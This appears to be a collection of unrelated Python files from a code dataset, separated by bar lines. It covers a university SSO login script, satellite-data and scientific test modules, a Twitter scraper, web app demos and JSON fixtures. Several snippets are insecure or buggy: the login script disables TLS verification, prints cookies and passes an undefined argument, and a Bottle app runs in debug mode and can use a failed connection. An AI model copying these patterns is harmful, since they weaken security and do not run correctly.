from pylevel.tests.test_putget import * # noqa
|
import requests
import re
import os
import time
requests.packages.urllib3.disable_warnings()
class ZJUHealthReport():
def __init__(self, user, passwd):
self.session = requests.Session()
if self.login(user,passwd):
print(str(requests.utils.dict_from_cookiejar(self.session.cookies)))
else:
print('登陆失败')
def login(self, user, passwd):
login_url = 'https://zjuam.zju.edu.cn/cas/login?service=https%3A%2F%2Fhealthreport.zju.edu.cn%2Fa_zju%2Fapi%2Fsso%2Findex%3Fredirect%3Dhttps%253A%252F%252Fhealthreport.zju.edu.cn%252Fncov%252Fwap%252Fdefault%252Findex'
res = self.session.get(url=login_url, verify=False)
execution = re.search('name="execution" value="(.*?)"', res.text).group(1)
res = self.session.get(url='https://zjuam.zju.edu.cn/cas/v2/getPubKey', verify=False).json()
M_str, e_str = res['modulus'], res['exponent']
password_bytes = bytes(passwd, 'ascii')
password_int = int.from_bytes(password_bytes, 'big')
e_int = int(e_str, 16)
M_int = int(M_str, 16)
result_int = pow(password_int, e_int, M_int)
encrypt_password = hex(result_int)[2:].rjust(128, '0')
data = {
'username': user,
'password': encrypt_password,
'execution': execution,
'_eventId': 'submit'
}
res = self.session.post(url=login_url, data=data, verify=False)
res.encoding = "utf-8"
if '统一身份认证' in res.text:
return False
return True
if __name__ == '__main__':
usr = r'XXX'
pwd = r'XXX' # 统一认证账号密码
try:
DK = ZJUHealthReport(usr, pwd, ua)
except Exception as e:
print(str(e))
|
"""Methods for downloading, parsing, and analyzing GOES Level 2 Wildfire data.
Full Scans of Fire for GOES-17
https://s3.console.aws.amazon.com/s3/buckets/noaa-goes17/ABI-L2-FDCF/?region=us-east-1&tab=overview
CONUS Scans of Fire for GOES-17
https://s3.console.aws.amazon.com/s3/buckets/noaa-goes17/ABI-L2-FDCC/?region=us-east-1&tab=overview
Full Scans of Fire for GOES-16
https://s3.console.aws.amazon.com/s3/buckets/noaa-goes16/ABI-L2-FDCF/?region=us-east-1&tab=overview
CONUS Scans of Fire for GOES-16
https://s3.console.aws.amazon.com/s3/buckets/noaa-goes16/ABI-L2-FDCC/?region=us-east-1&tab=overview
"""
from .utilities import *
from .downloader import *
|
# -*- coding: utf-8 -*-
from django.db import models
class Document(models.Model):
upload_to='documents'+'\\'
#upload_to=upload_to.replace("/", "\/")
#upload_to=upload_to.replace("/"," ")
docfile = models.FileField(upload_to) |
__author__ = 'spousty'
import psycopg2
from bottle import route, run, get, DEBUG
import os
@route('/')
def index():
return "<h1> hello OpenShift Ninja without DB</h1>"
# since this is a read only talk to the replicas
@get('/db')
def dbexample():
print(os.environ.get('POSTGRESQL_USER'))
print("After Env")
try:
conn = psycopg2.connect(database=os.environ.get('PG_DATABASE'), user=os.environ.get('PG_USER'), host=os.environ.get('PG_SLAVE_RC_DC_SERVICE_HOST'), password=os.environ.get('PG_ROOT_PASSWORD'))
except:
print(os.environ.get('PG_USER') + " " + os.environ.get('PG_SLAVE_RC_DC_SERVICE_HOST'))
cur = conn.cursor()
cur.execute("""select parkid, name, ST_AsText(the_geom) from parkpoints limit 10""")
rows = cur.fetchall()
result_string = "<h2>Here are your results: </h2>"
for row in rows:
result_string += "<h3>" + str(row[0]) + ", " + str(row[1]) + ", " + str(row[2]) + "</h3>"
cur.close()
conn.close()
return result_string
if __name__ == '__main__':
run(host='0.0.0.0', port=8080, debug=True)
|
from __future__ import print_function, division
import unittest, numpy as np
from pyscf import gto, tddft, scf
from pyscf.nao import bse_iter
from pyscf.nao import polariz_inter_ave, polariz_nonin_ave
mol = gto.M( verbose = 1, atom = '''Be 0 0 0;''', basis = 'cc-pvdz',)
gto_mf = scf.RHF(mol)
gto_mf.kernel()
class KnowValues(unittest.TestCase):
def test_bse_gto_vs_nao_nonin_0081(self):
""" Non-interacting case """
#print(__name__, 'gto.mo_energy', gto_mf.mo_energy)
nao_td = bse_iter(mf=gto_mf, gto=mol, verbosity=0, perform_gw=True)
omegas = np.linspace(0.0,2.0,450)+1j*0.04
p_iter = -nao_td.comp_polariz_nonin_ave(omegas).imag
data = np.array([omegas.real*27.2114, p_iter])
np.savetxt('be.bse_iter.omega.nonin.ave.txt', data.T, fmt=['%f','%f'])
if __name__ == "__main__": unittest.main()
|
import warnings
from numpy.testing import assert_almost_equal
from pyproj import Proj, proj_version_str, transform
# illustrates the use of the transform function to
# perform coordinate transformations with datum shifts.
#
# This example is from Roberto Vidmar
#
# Test point is Trieste, Molo Sartorio
#
# This data come from the Istituto Geografico Militare (IGM), as well as
# the 7 parameters to transform from Gauss-Boaga (our reference frame)
# to WGS84
#
# WGS84 Lat: 45d38'49.879" (45.647188611)
# WGS84 Lon: 13d45'34.397" (13.759554722)
# WGS84 z: 52.80;
# UTM 33: 403340.97 5055597.17
# GB: 2423346.99 5055619.87
UTM_x = 403340.9672367854
UTM_y = 5055597.175553089
GB_x = 2423346.99
GB_y = 5055619.87
WGS84_lat = 45.647188611 # Degrees
WGS84_lon = 13.759554722 # Degrees
UTM_z = WGS84_z = 52.8 # Ellipsoidical height in meters
WGS84_PROJ = Proj(proj="latlong", datum="WGS84")
UTM_33_PROJ = Proj(proj="utm", zone="33")
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
GAUSSSB_PROJ = Proj(
init="epsg:3004", towgs84="-122.74,-34.27,-22.83,-1.884,-3.400,-3.030,-15.62"
)
print("proj4 library version = ", proj_version_str)
def test_shift_wgs84_to_utm33():
xutm33, yutm33, zutm33 = transform(
WGS84_PROJ, UTM_33_PROJ, WGS84_lon, WGS84_lat, WGS84_z
)
assert_almost_equal((xutm33, yutm33, zutm33), (UTM_x, UTM_y, UTM_z))
def test_shift_utm33_to_wgs84():
back_lon, back_lat, back_z = transform(UTM_33_PROJ, WGS84_PROJ, UTM_x, UTM_y, UTM_z)
assert_almost_equal((back_lon, back_lat, back_z), (WGS84_lon, WGS84_lat, WGS84_z))
def test_shift_wgs84_to_gaussb_no_ellisoidal_height():
xgb, ygb, zgb = transform(WGS84_PROJ, GAUSSSB_PROJ, WGS84_lon, WGS84_lat, 0)
assert_almost_equal((xgb, ygb, zgb), (GB_x, 5055619.899, 0), decimal=2)
def test_shift_gaussb_to_wgs84_no_ellisoidal_height():
back_lon, back_lat, back_z = transform(GAUSSSB_PROJ, WGS84_PROJ, GB_x, GB_y, 0)
assert_almost_equal(
(back_lon, back_lat, back_z), (WGS84_lon, WGS84_lat, 0), decimal=3
)
|
class BankAccount(object):
def __init__(self, balance):
self.balance = balance
def deposit(self, amount):
self.amount = amount
self.balance += amount
return self.balance
def withdraw(self, amount):
if amount > self.balance:
return 'invalid transaction'
else:
self.balance -= amount
class MinimumBalanceAccount(BankAccount):
def __init__(self, balance):
self.balance = balance
super(BankAccount, self).__init__()
|
#! /usr/bin/python3
import calendar
import email.utils
import pkgutil
import sys
import time
import twython
from lib.shared import url_database
class DbStub:
def __init__(self):
self.database = "tbbscraper_db"
def connect_to_twitter_api():
cred = pkgutil.get_data("lib.url_sources", "twitter_credential.txt").strip()
(app_key, app_secret, oauth_token, oauth_secret) = cred.split()
return twython.Twython(app_key, app_secret, oauth_token, oauth_secret)
class RateLimitWrapper:
def __init__(self, api, method, method_name, family):
self.api = api
self.method = method
self.method_name = method_name
self.family = family
self.update()
def update(self):
data = self.api.get_application_rate_limit_status(resources=self.family)
data = data["resources"][self.family][self.method_name]
self.remaining = data["remaining"]
self.reset_time = data["reset"]
now = time.time()
self.last_call_time = now
if self.remaining > 0:
self.interval = (self.reset_time - now) / self.remaining
else:
self.interval = self.reset_time - now
sys.stderr.write("\n{}: {} calls before {}, interval={:.3}s\n"
.format(time.strftime("%H:%M:%S", time.gmtime(now)),
self.remaining,
time.strftime("%H:%M:%S",
time.gmtime(self.reset_time)),
self.interval))
def __call__(self, **params):
now = time.time()
till_end_of_window = self.reset_time - now
if self.remaining == 0 or till_end_of_window < 0:
# If we are completely out of calls, wait out the entire
# window and then query for a new window.
if till_end_of_window > 0:
sys.stderr.write("(waiting {:.3}s)".format(till_end_of_window))
sys.stderr.flush()
time.sleep(till_end_of_window)
self.update()
else:
# Spread the method calls we're allowed to make over the
# window between now and the reset time.
delay = (self.last_call_time + self.interval) - now
if delay > 0:
sys.stderr.write("(waiting {:.3}s)".format(delay))
sys.stderr.flush()
time.sleep(delay)
self.last_call_time = time.time()
self.remaining -= 1
return self.method(**params)
def next_ublock(lookup_user, block):
uid_string = ",".join(str(r[0]) for r in block)
try:
return lookup_user(user_id=uid_string, include_entities=False)
except twython.TwythonError:
# "If none of your lookup criteria can be satisfied by
# returning a user object, a HTTP 404 will be thrown."
# I *think* in our case this means "if none of the users in
# the block exist anymore" but let's log 'em just to be sure.
sys.stderr.write("\n404 Not Found: " + uid_string + "\n")
sys.stderr.flush()
return []
def main():
db = url_database.ensure_database(DbStub())
twi = connect_to_twitter_api()
lookup_user = RateLimitWrapper(twi, twi.lookup_user,
"/users/lookup", "users")
urls = []
users = []
with db, db.cursor() as cur:
cur.execute("SELECT uid FROM twitter_users")
while True:
sys.stderr.write("\r{} users, {} urls...\033[K"
.format(len(users), len(urls)))
sys.stderr.flush()
block = cur.fetchmany(100)
if not block: break
ublock = next_ublock(lookup_user, block)
for u in ublock:
users.append(
{ 'id': u['id'],
# no created_at_in_seconds for users :-(
'ca': calendar.timegm(
email.utils.parsedate(u['created_at'])),
'vr': int(u.get('verified', False)),
'pr': int(u.get('protected', False)),
'sn': u['screen_name'],
'nm': u.get('name', ""),
'la': u.get('lang', ""),
'lo': u.get('location', ""),
'ds': u.get('description', "") })
for thing in u.get('entities', {}).values():
for url in thing.get('urls', []):
eu = url.get('expanded_url', None)
if eu:
urls.append((eu, u['id']))
with db, db.cursor() as cur:
sys.stderr.write("\nrecording url strings...")
urls = list(set((url_database.add_url_string(cur, url[0])[0], url[1])
for url in urls))
sys.stderr.write("\nupdating user table...")
cur.executemany(
"UPDATE twitter_users"
" SET created_at = %(ca)s,"
" verified = %(vr)s,"
" protected = %(pr)s,"
" screen_name = %(sn)s,"
" full_name = %(nm)s,"
" lang = %(la)s,"
" location = %(lo)s,"
" description = %(ds)s"
" WHERE uid = %(id)s",
users)
sys.stderr.write("\nupdating urls table...")
cur.executemany(
"INSERT INTO urls_twitter_user_profiles (url, uid) "
" VALUES (%s, %s)",
urls)
sys.stderr.write("\n")
main()
|
import os
# Set library exports
from . import kernels, sparse, center_selection, preconditioner, optim
from .options import FalkonOptions
from .models import Falkon, LogisticFalkon, InCoreFalkon
init_dir = os.path.dirname(os.path.abspath(__file__))
# Set __version__ attribute on the package
with open(os.path.join(init_dir, 'VERSION')) as version_file:
__version__ = version_file.read().strip()
__all__ = (
'Falkon',
'LogisticFalkon',
'InCoreFalkon',
'kernels',
'optim',
'preconditioner',
'center_selection',
'sparse',
'FalkonOptions',
)
|
from application import celery
@celery.task
def simple_task():
return "Hello, world!"
|
from argparse import _SubParsersAction
import torch
from pathlib import Path
from skimage import io as skio
from utils.patch_utils import get_file_lists, load_image
from utils.train import seed_all, set_model, get_calculated_means_stds_trainval, get_patch_lists
from utils.predict import get_test_loader, predict, reshape_predictions_to_images
from utils.parser import create_test_parser
args = create_test_parser()
subset:str = args.subset
root_path:str = args.root_path
model_save_path:str = args.model
batch_size:int = args.batch_size
device:str = "cuda" if torch.cuda.is_available() else "cpu"
seed_all(seed=args.seed)
print(f"Using Seed {args.seed}")
data_path = Path(root_path) / "data"
model_save_stem = model_save_path.split('/')[-1]
architecture = model_save_stem.split('_')[-3]
feature_extractor = model_save_stem.split('_')[-2]
path_to_save = Path(root_path) / "results" / "predictions" / subset
path_to_save.mkdir(parents=True, exist_ok=True)
test_imgs, test_msks = get_patch_lists(
data_path=data_path,
subset=subset)
test_complete_img_ls, _ = get_file_lists(
data_path,
subset=subset)
img_shape = load_image(path = str(test_complete_img_ls[0])).shape
means, stds = get_calculated_means_stds_trainval()
test_loader = get_test_loader(
test_img_dir=test_imgs,
test_msk_dir=test_msks,
mean=means,
std=stds,
batch_size=batch_size,
)
loaded_model = torch.load(model_save_path)
print(f"Loading: {architecture} {feature_extractor} ...")
model = set_model(architecture=architecture, feature_extractor=feature_extractor).to(device=device)
model.load_state_dict(loaded_model)
preds = predict(
model=model,
test_loader=test_loader,
device=device)
print(f"Predicting...")
print("Combining Slices...")
colored_predictions = reshape_predictions_to_images(preds=preds, labels=[(199, 199, 199), (31, 119, 180), (255, 127, 14)], mask_shape =img_shape[:2])
print(f"Saving Predictions to {path_to_save}...")
for preds_to_save, img_name in zip(colored_predictions, test_complete_img_ls):
skio.imsave(f"{path_to_save}/{img_name.stem}_pred.png", preds_to_save, check_contrast=False) |
# Copyright 2010-2012 Institut Mines-Telecom
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Created on Jun 19, 2012
@author: Bilel Msekni
@contact: bilel.msekni@telecom-sudparis.eu
@author: Houssem Medhioub
@contact: houssem.medhioub@it-sudparis.eu
@organization: Institut Mines-Telecom - Telecom SudParis
@license: Apache License, Version 2.0
"""
#=======================================================================================================================
# JSON format
#=======================================================================================================================
resource = """{
"resources": [
{
"kind": "http://schemas.ogf.org/occi/infrastructure#compute",
"mixins": [
"http://example.com/template/resource#medium"
],
"attributes": {
"occi": {
"compute": {
"speed": 2,
"memory": 4,
"cores": 12
}
}
},
"actions": [
{
"title": "Start My Server",
"href": "/compute/996ad860-2a9a-504f-8861-aeafd0b2ae29?action=start",
"category": "http://schemas.ogf.org/occi/infrastructure/compute/action#start"
}
],
"id": "9930",
"title": "Compute resource",
"summary": "This is a compute resource"
}
]
}
"""
#=======================================================================================================================
link = """
{
"links": [
{
"kind": "http://schemas.ogf.org/occi/infrastructure#compute",
"mixins": [
"http://example.com/template/resource#medium"
],
"attributes": {
"occi": {
"infrastructure": {
"networkinterface": {
"interface": "eth0",
"mac": "00:80:41:ae:fd:7e",
"address": "192.168.0.100",
"gateway": "192.168.0.1",
"allocation": "dynamic"
}
}
}
},
"id": "22fe83ae-a20f-54fc-b436-cec85c94c5e8",
"title": "Mynetworkinterface",
"target": "http://127.0.0.1:8090/bilel/vms/v2",
"source": "http://127.0.0.1:8090/bilel/vms/v1"
}
]
}
"""
#=======================================================================================================================
j_occi_att = """
{
"resources": [
{
"attributes": {
"occi": {
"compute": {
"speed": 2,
"memory": 4,
"cores": 12
}
}
}
}
]
}
"""
action_plus_attributes =\
"""
{
"actions": [
{
"term": "start",
"scheme": "http://schemas.ogf.org/occi/infrastructure/compute/action#",
"title": "Start Compute instance now",
"attributes": {
"method": {
"mutable": true,
"required": false,
"type": "string",
"pattern": "graceful|acpion|poweron",
"default": "poweron"
}
}
}
],
"attributes": {
"occi": {
"infrastructure": {
"networkinterface": {
"interface": "eth0",
"mac": "00:80:41:ae:fd:7e",
"address": "192.168.0.100",
"gateway": "192.168.0.1",
"allocation": "dynamic"
}
}
}
}
}
"""
#=======================================================================================================================
# HTTP format
#=======================================================================================================================
entity_http = "Category: compute; scheme=\"http://schemas.ogf.org/occi/infrastructure#\"; class=\"kind\";"\
"Category: my_stuff; scheme=\"http://example.com/template/resource#\"; class=\"medium\";"\
"X-OCCI-Attribute: occi.compute.cores=2"\
"Link: </users/foo/compute/b9ff813e-fee5-4a9d-b839-673f39746096?action=start>;"\
"rel=\"http://schemas.ogf.org/occi/infrastructure/compute/action#start\""
#=======================================================================================================================
x_occi_att = "X-OCCI-Attribute: occi.compute.cores=20:2"
action_att_http = """Category: start;
scheme="http://schemas.ogf.org/occi/infrastructure/compute/action#";
class=action;
X-OCCI-Attribute: occi.compute.cores=20:2
""" |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Hello World
author: gxcuizy
date: 2018-10-15
"""
import random
# 程序主入口
if __name__ == '__main__':
# 打印
print('Hello World!')
# 取4个随机数
i = 0
rand_list = []
while i < 4:
rand_num = random.randint(0, 499)
if rand_num not in rand_list:
rand_list.append(rand_num)
i += 1
# 输出组队随机编码
print(rand_list)
|
import py
from pypy.rpython.test.test_rstr import BaseTestRstr
from pypy.translator.llvm.test.runtest import *
# ====> ../../../rpython/test/test_rstr.py
class TestLLVMStr(LLVMTest, BaseTestRstr):
EMPTY_STRING_HASH = -1
def test_int(self):
py.test.skip('XXX special case me')
def test_float(self):
py.test.skip('XXX special case me')
def test_inplace_add(self):
py.test.skip('XXX special case me')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.